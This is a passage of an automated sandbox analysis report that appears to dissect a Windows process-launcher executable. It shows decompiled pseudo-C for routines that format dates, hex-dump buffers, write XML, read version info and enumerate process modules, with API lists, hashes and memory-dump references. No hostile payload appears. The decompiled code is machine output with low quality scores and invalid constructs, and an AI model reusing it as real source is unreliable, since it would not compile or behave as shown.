                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                    • wcscpy.MSVCRT ref: 00404F41
                                                                                                                    • wcscat.MSVCRT ref: 00404F4E
                                                                                                                    • wcscat.MSVCRT ref: 00404F5D
                                                                                                                    • wcscpy.MSVCRT ref: 00404F71
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1331804452-0
                                                                                                                    • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                    • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                    • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                    • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 71%
                                                                                                                    			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                    0x00404fe0
                                                                                                                    0x00404fe9
                                                                                                                    0x00405000
                                                                                                                    0x00405005
                                                                                                                    0x00405009
                                                                                                                    0x0040500c
                                                                                                                    0x0040500e
                                                                                                                    0x00405015
                                                                                                                    0x00405016
                                                                                                                    0x00405021
                                                                                                                    0x00405026
                                                                                                                    0x00405027
                                                                                                                    0x0040502c
                                                                                                                    0x00405031
                                                                                                                    0x00405039
                                                                                                                    0x0040503f
                                                                                                                    0x00405044
                                                                                                                    0x00405048
                                                                                                                    0x0040504e
                                                                                                                    0x00405056
                                                                                                                    0x0040505c
                                                                                                                    0x0040504e
                                                                                                                    0x00405065
                                                                                                                    0x0040506a
                                                                                                                    0x00405072
                                                                                                                    0x00405079

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                    • String ID: %2.2X
                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                    • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                    • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                    • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                    • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 42%
                                                                                                                    			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                    0x00407d9c
                                                                                                                    0x00407d9e
                                                                                                                    0x00407da5
                                                                                                                    0x00407db3
                                                                                                                    0x00407dba
                                                                                                                    0x00407dc5
                                                                                                                    0x00407dc7
                                                                                                                    0x00407dd0
                                                                                                                    0x00407dc9
                                                                                                                    0x00407dc9
                                                                                                                    0x00407dc9
                                                                                                                    0x00407dd8
                                                                                                                    0x00407de1
                                                                                                                    0x00407de5
                                                                                                                    0x00407deb
                                                                                                                    0x00407df2
                                                                                                                    0x00407df3
                                                                                                                    0x00407dfe
                                                                                                                    0x00407e03
                                                                                                                    0x00407e04
                                                                                                                    0x00407e21

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                    • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                    • <%s>, xrefs: 00407DF3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                    • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                    • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                    • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                    • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 70%
                                                                                                                    			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                    0x00403b56
                                                                                                                    0x00403b5d
                                                                                                                    0x00403b6f
                                                                                                                    0x00403b76
                                                                                                                    0x00403b82
                                                                                                                    0x00403b8d
                                                                                                                    0x00403b8e
                                                                                                                    0x00403b99
                                                                                                                    0x00403b9e
                                                                                                                    0x00403b9f
                                                                                                                    0x00403ba7
                                                                                                                    0x00403bb9
                                                                                                                    0x00403bce
                                                                                                                    0x00403be5
                                                                                                                    0x00403bef
                                                                                                                    0x00403bf8
                                                                                                                    0x00403c00

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00403B5D
                                                                                                                    • memset.MSVCRT ref: 00403B76
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                      • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                      • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                      • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                      • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                      • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                      • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                    • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                    • API String ID: 1832587304-479876776
                                                                                                                    • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                    • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                    • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                    • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                    0x0040afd3
                                                                                                                    0x0040afe2
                                                                                                                    0x0040aff3
                                                                                                                    0x0040b002
                                                                                                                    0x0040b023
                                                                                                                    0x00000000
                                                                                                                    0x0040b047
                                                                                                                    0x0040b02e
                                                                                                                    0x0040b034
                                                                                                                    0x0040b03c
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                    • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                    • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                    • wcscat.MSVCRT ref: 0040B002
                                                                                                                    • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                      • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                      • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                      • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                                      • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                    • API String ID: 393120378-2245444037
                                                                                                                    • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                    • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                    • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                    • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                    • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                    • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                    • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                    • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 35%
                                                                                                                    			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}
























                                                                                                                    0x004092f3
                                                                                                                    0x004092fb
                                                                                                                    0x00409303
                                                                                                                    0x00409305
                                                                                                                    0x00409310
                                                                                                                    0x00409439
                                                                                                                    0x0040943f
                                                                                                                    0x00409445
                                                                                                                    0x0040944e
                                                                                                                    0x00409452
                                                                                                                    0x00409466
                                                                                                                    0x0040946e
                                                                                                                    0x00409475
                                                                                                                    0x004094f7
                                                                                                                    0x00409488
                                                                                                                    0x00409494
                                                                                                                    0x004094a5
                                                                                                                    0x004094a9
                                                                                                                    0x004094b5
                                                                                                                    0x004094c3
                                                                                                                    0x004094c6
                                                                                                                    0x004094d5
                                                                                                                    0x004094e3
                                                                                                                    0x004094f1
                                                                                                                    0x00000000
                                                                                                                    0x004094f1
                                                                                                                    0x00000000
                                                                                                                    0x004094e3
                                                                                                                    0x00000000
                                                                                                                    0x004094f7
                                                                                                                    0x00409452
                                                                                                                    0x00409322
                                                                                                                    0x0040932b
                                                                                                                    0x00409333
                                                                                                                    0x00409337
                                                                                                                    0x00409341
                                                                                                                    0x00409342
                                                                                                                    0x0040934e
                                                                                                                    0x0040934f
                                                                                                                    0x00409358
                                                                                                                    0x0040935e
                                                                                                                    0x0040935e
                                                                                                                    0x00409363
                                                                                                                    0x0040936b
                                                                                                                    0x0040936d
                                                                                                                    0x00409377
                                                                                                                    0x00409385
                                                                                                                    0x0040938d
                                                                                                                    0x0040939d
                                                                                                                    0x004093a5
                                                                                                                    0x004093ac
                                                                                                                    0x004093b4
                                                                                                                    0x004093c5
                                                                                                                    0x004093c9
                                                                                                                    0x004093da
                                                                                                                    0x004093df
                                                                                                                    0x004093e5
                                                                                                                    0x004093e6
                                                                                                                    0x004093ea
                                                                                                                    0x004093f6
                                                                                                                    0x004093fc
                                                                                                                    0x00409407
                                                                                                                    0x00409407
                                                                                                                    0x0040941d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409423
                                                                                                                    0x00409428
                                                                                                                    0x00409375
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040942e
                                                                                                                    0x00000000
                                                                                                                    0x00409428
                                                                                                                    0x00409377
                                                                                                                    0x0040936d
                                                                                                                    0x004094fb
                                                                                                                    0x004094ff
                                                                                                                    0x004094ff
                                                                                                                    0x00409337
                                                                                                                    0x0040950f

                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                    • memset.MSVCRT ref: 0040938D
                                                                                                                    • memset.MSVCRT ref: 0040939D
                                                                                                                      • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                    • memset.MSVCRT ref: 00409488
                                                                                                                    • wcscpy.MSVCRT ref: 004094A9
                                                                                                                    • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3300951397-0
                                                                                                                    • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                    • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                    • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                    • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                    0x00402ed7
                                                                                                                    0x00402eee
                                                                                                                    0x00402ef8
                                                                                                                    0x00402f00
                                                                                                                    0x00402f01
                                                                                                                    0x00402f05
                                                                                                                    0x00402f0a
                                                                                                                    0x00402f1a
                                                                                                                    0x00402f30

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 19018683-0
                                                                                                                    • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                    • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                    • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                    • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 50%
                                                                                                                    			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                    0x004079a4
                                                                                                                    0x004079b8
                                                                                                                    0x004079bd
                                                                                                                    0x004079c2
                                                                                                                    0x004079c5
                                                                                                                    0x004079c5
                                                                                                                    0x004079db
                                                                                                                    0x004079f7
                                                                                                                    0x00407a06
                                                                                                                    0x00407a0c
                                                                                                                    0x00407a11
                                                                                                                    0x00407a13
                                                                                                                    0x00407a14
                                                                                                                    0x00407a17
                                                                                                                    0x00407a18
                                                                                                                    0x00407a1d
                                                                                                                    0x00407a22
                                                                                                                    0x00407a25
                                                                                                                    0x00407a2a
                                                                                                                    0x00407a35
                                                                                                                    0x00407a3a
                                                                                                                    0x00407a3b
                                                                                                                    0x00407a40
                                                                                                                    0x00407a52

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004079DB
                                                                                                                      • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                      • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                      • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                    • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                                    • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
